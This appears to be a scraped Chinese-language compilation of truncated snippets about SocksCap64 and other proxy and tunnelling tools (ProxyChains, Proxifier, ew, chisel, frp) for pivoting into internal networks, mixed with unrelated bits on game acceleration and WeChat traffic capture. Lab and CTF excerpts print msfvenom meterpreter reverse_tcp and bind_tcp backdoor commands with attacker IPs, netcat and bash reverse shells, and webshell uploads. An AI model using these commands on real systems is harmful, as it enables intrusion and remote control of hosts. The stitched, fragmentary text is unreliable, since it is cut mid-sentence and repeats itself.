五、SocksCap64 工具介绍 SocksCap64是一款在Windows环境中相当好用的全局代理软件。...SocksCap64可以使Windows应用程序通过SOCKS代理服务器来访问网络,而不需要对这些应用程序进行任何修改。...Proxifier提供了跨平台的端口转发和代理功能,适用于Windows、Linux、MacOS平台。 image.png 0x03 基本实验 基本实验目的为掌握工具的基本使用场景、配置和使用。...image.png 三、ew、SocksCap64和Proxifier基本实验 1....SocksCap64 配置SOCKS通信 mstsc程序,该程序没有自带socks连接,所以需要借助SocksCap64代理软件来实现。
有点类似SOCKSCAP。...4,FreeCap来自Sockscap的代理服务器第三方支持软件,支持HTTP和SOCKS4代理,并且很方便的支持密码验证,FreeCap 跟大家熟悉的SocksCap一样,是一个代理调度程序,但实际上它的特性可比...SocksCap强多了:1、支持多级代理链(例如 SOCKSv4 -> HTTP -> SOCKSv4 -> SOCKSv5) (这个SocksCap也没有)2、支持socks5, socks4/socks4a..., http tunel 的代理调度功能(SocksCap只支持对socks代理的调度)3、遵守RFC 1928, 1929, 2817协议,也就是说支持代理身份验证5,e-borderNEC e-Border...除了能像 SocksCap32 那样对于特定的程序提供 Socks5 代理,也能截取你系统里的所有连接请求,将它们通过代理连接出去。更能设置多个 Socks5 代理服务器,提供更快更稳定的连接。
(2)SocksCap64Sockscap64是由Taro开发的免费代理客户端软件,如图1-2所示,可以使windows网络应用程序通过socks代理服务器开访问网络而不需要对应用程序进行任何修改,即便某些程序不支持...Sockscap64目前只支持socks4、socks5及TCP连接。...(3)ProxychainsProxyChains是一个基于linux和其他Unix的开源代理工具,如图1-3所示,其支持http、socks4和socks5进行代理连接。
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。...4.SocksCap64 工具网址:http://www.sockscap64.com SocksCap64是一款在windows下相当好使的全局代理软件。...SocksCap64可以使Windows应用程序通过SOCKS代理服务器来访问网络而不需要对这些应用程序做任何修改, 即使某些本身不支持SOCKS代理的应用程序通过SocksCap64之后都可以完美的实现代理访问...整个数据流向是:SOCKS V5 → 1080 → 888 →999 →777 → rssocks 0×06 内网漫游 1.Windows下使用sockscap64 首先下载安装好SocksCap64后...2.LINUX下使用proxychains KALI系统已经预装好了这个工具,我们稍作配置就可以使用,打开终端,输入命令: vi /etc/proxychains.conf # 顺便补充下LINUX下Vim
# SocksCap64 后来发现看到网上有人说ss配合SocksCap64(见下图)可以对特定程序进行加速,从而对某个游戏进行加速,我没有测试成功,有可能是因为ss的线路不对,现在看来,用ss玩游戏还是用香港的线路比较好...# SSTap 最近发现SocksCap64的开发者开发了专门针对外服游戏的工具SSTap(见下图),并且不用配合ss可以独立工作。进行相关配置(切记使用香港路线)以后就可以直接google和外服。...# 彩蛋 SocksCap64和SSTap的网址:https://www.sockscap64.com ,如果你说找不到SSTap,就说明你不认真呀小伙子!还有,切记尽量使用香港线路玩游戏!
三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机...这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的...因此,如果想要像之前一样使用SocksCap去代理访问内网,需要再多做一步,使用ssh的本地转发功能将127.0.0.1的1080上的socks流量转发到0.0.0.0的23333端口,这样我们就可以在外部通过...成功将127.0.0.1的1080端口上的流量转发到0.0.0.0的23333端口上,这样就可以使用socksCap或者直接在浏览器中设置代理对内网资源进行访问。...使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
当然windows系统可以使用SocksCap等工具进行代理: 应用层的隧道还有有一个重要的技术就是DNS隧道技术,我将在未来专门写一个专题来对其进行介绍。...该工具包中有多个可执行文件,以适应不同的操作系统(Linux、Windows、Mac OS、ARM-Linux均包含在内) reGeorg 下载地址:https://github.com/sensepost...接下来我们就可以设置proxychains或SocksCap64添加这个socks代理服务器(192.168.1.7)的代理即可。...在攻击者公网vps上面上传ew_for_linux64并执行: ....除了proxychains,我们还可以使用proxifier、sockscap64等代理工具。如下,我们使用sockscap64来访问内网机器。
为了进一步做内网渗透,上传msf后门: 1、后门制作: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=...可以看到shell路径,用蚁剑连接,因为是第二层网络,所以得通过socks代理客户端去启动蚁剑,我用的是sockscap64: ? 在代理中配置代理服务器: ? 用蚁剑连接shell: ?...在sockscap64中打开ssh客户端: ? 也可以利用root/123456登录,获得flag ?...同样,为了打进第三层,我们需要在第二层靶机上上传msf后门, 制作后门: msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4321 -f elf > shell1
2、生成并上传木马且回连meterpreter 查看phpinfo目标主机为Linux系统的主机。...kali下敏感目录扫描工具Nikto使用:攻击机:172.16.6.147(kali linux)、靶机:192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 进行敏感目录扫描...http://192.168.6.17/upload/images/20201022123044.php 在win10上安装sockscap,管理员身份运行,代理设置kali的IP地址,端口1080。...在sockscap上添加菜刀程序。使用菜刀连接木马。 2、MSF生成php木马反弹meterpreter 通过菜刀连接,发现目标主机为Linux系统。 用MSF生成的反弹木马,然后起监听。...msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=2339 -f elf -a x86 —platform linux
对于这种情况,可以通过安卓模拟器抓微信包、真机微信抓包的方式解决,但都相对不太方便,和大家分享通过SocksCap64直接抓微信PC端的流量方法。...SocksCap64是一款功能非常强大的代理客户端,支持http/https、socks4/5、TCP、UDP等协议,在内网渗透中经常使用,同样可以用他来代理微信PC客户端的流量,并将流量转发至burp...然后在SocksCap64中设置代理服务器为burp的地址和端口,代理方式HTTP: ? 测试一下,是否成功: ? 然后利用SocksCap64启动微信: ? 即可成功抓到微信PC端的流量: ?
2、生成并上传木马且回连meterpreter 查看phpinfo目标主机为Linux系统的主机。 ?...platform linux -o /home/hula.elf 并use exploit/multi/handle模块监听木马回连情况。...kali下敏感目录扫描工具Nikto使用:攻击机:172.16.6.147(kali linux)靶机:192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 进行敏感目录扫描...在win10上安装sockscap,管理员身份运行,代理设置kali的IP地址,端口1080。在sockscap上添加菜刀程序。使用菜刀连接木马。 ?...linux -o /home/biu.elf 通过菜刀上传到目标主机,赋予权限,然后运行。
如:proxychains curl 192.168.10.19 如果是Windows系统,直接浏览器中设置代理为 100.100.10.12的1080端口,或者利用 Proxifier 、sockscap64...8888 #将本机的8888端口的流量都转发给1080端口,这里8888端口只是用于传输流量 然后浏览器中设置代理为 100.100.10.12的1080端口,或者利用 Proxifier 、sockscap64...设置全局代理 Ssocks正向代理(Linux) Ssocks是Linux下一款端口转发的工具,而proxychains代理链是Linux下一款代理设置工具。...Web服务器的网页文件:proxychains curl 192.168.10.19 如果这里我们的主机是Windows系统的话,Windows系统下也有很多代理工具,比如 Proxifier 、sockscap64...在公网Linux服务器上的操作 .
、MacOS平台SocksCap64可以使Windows应用程序通过sOCKS代理服务器来访问网络,而不需要对这些应用程序进行任何修改。...即使是那些本身不支持SOCKS代理的应用程序,也可以通过SocksCap64实现代理 ProxyChains ProxyChains是款可以在Linux下实现全局代理的软件,性能稳定、可靠,可以使任何程序通过代理上网...EW工具包提供了多个可执行文件,以适用不同的操作系统(Linux、Windows、 Mac OS、ARM-Linux 均包含在内)。.../ew_for_linux64 -s rcsocks -l 6000 -e 7000 ?...SocksCap64使用方法之使用SocksCap64代理Steam、LOL等游戏的教程_网络通讯_软件教程_脚本之家 (jb51.net) Ubuntu系统中使用ProxyChains设置网络代理 -
2.利用NC工具在linux执行反弹shell (1)Linux正向连接shell 假设在linux操作系统中想要获取反弹shell,其中反弹方式和上述演示的Windows操作系统不同,以两台linux...(2)利用Linux自带bash反弹Shell 1)首先在攻击机中使用nc执行nc -lvp 8888命令开启监听,执行结果如图1-10所示。...(2)SocksCap64 Sockscap64是由Taro开发的免费代理客户端软件,如图1-26所示,可以使windows网络应用程序通过socks代理服务器开访问网络而不需要对应用程序进行任何修改,...Sockscap64目前只支持socks4、socks5及TCP连接。...(3)Proxychains ProxyChains是一个基于linux和其他Unix的开源代理工具,如图1-27所示,其支持http、socks4和socks5进行代理连接。
sockscap,老牌的socks代理工具,主要针对windows平台的端口转发和代理转发。...proxifier,跨平台的端口转发和代理工具,适用windows,linux,Macos平台,代理转发利器 Rsscoks,*nix平台下的端口转发和代理工具,配合proxychains好用到不行
【软件工具】服务器:WindowsServer20081台;防火墙1台;Centos71台;Windows103台;Windows20161台;交换机/路由:交换机4台;路由器1台;软件:frp;SocksCap64...展开代码语言:TXTAI代码解释frpc-cfrpc.ini依次双击打开桌面上的【工具】→【SocksCap64-4.7】文件夹,并双击打开【SocksCap64.exe】socks代理客户端软件。...注:打开SocksCap64.exe会有些慢。在socks代理客户端软件窗口中,双击【远程桌面连接*32】图标。
上面ok了,接下来在你本机安装sockscap, Sockscap设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。...内网web,通过内网的扫描,用sockscap上的ie来打开内网开放的web,在内网采用web注入或上传的方式来获取webshell提权。 3....猜解sql弱口令,在sockscap控制台中用sql连接器连接内网开放1433或是3306的机器,猜解弱口令。 5. 内网嗅探,不得已的办法,不推荐。 6.
sockscap:老牌的socks代理工具,主要针对windows平台的端口转发和代理转发。...proxifier:跨平台的端口转发和代理工具,适用windows,linux,Macos平台,代理转发利器 Rsscoks:*nix平台下的端口转发和代理工具,配合proxychains好用到不行。...www.freebuf.com/sectool/94275.html Empyre:渗透Mac OSX的漏洞利用框架 http://www.freebuf.com/sectool/118715.html 在 Kali Linux...下实战 Nmap(网络安全扫描器) https://linux.cn/article-7960-1.html Nishang:PowerShell渗透测试工具(一二) http://bobao
文章内容展示cs完整上线过程,msf思路等同 要点 #网络通讯-MSF&CS-路由添加&节点建立 #控制上线-MSF&CS-协议生成&正反连接 代理协议: SOCKS4/5 代理软件: SocksCap...bind_tcp port 命令:connect ip port 效果图: 其它补充: ip地址每次重启会发生更改-DHCP协议 搭建环境VM虚拟网卡设置问题、增加网卡搭建环境-模拟不同局域网 下次更新linux
Win7/Win10 和 MacOS,支持http/https、socks4/5、TCP、UDP等协议,可以指定端口,指定IP,指定域名、指定程序、指定用户名密码授权等运行模式,兼容性非常好,有点类似SOCKSCAP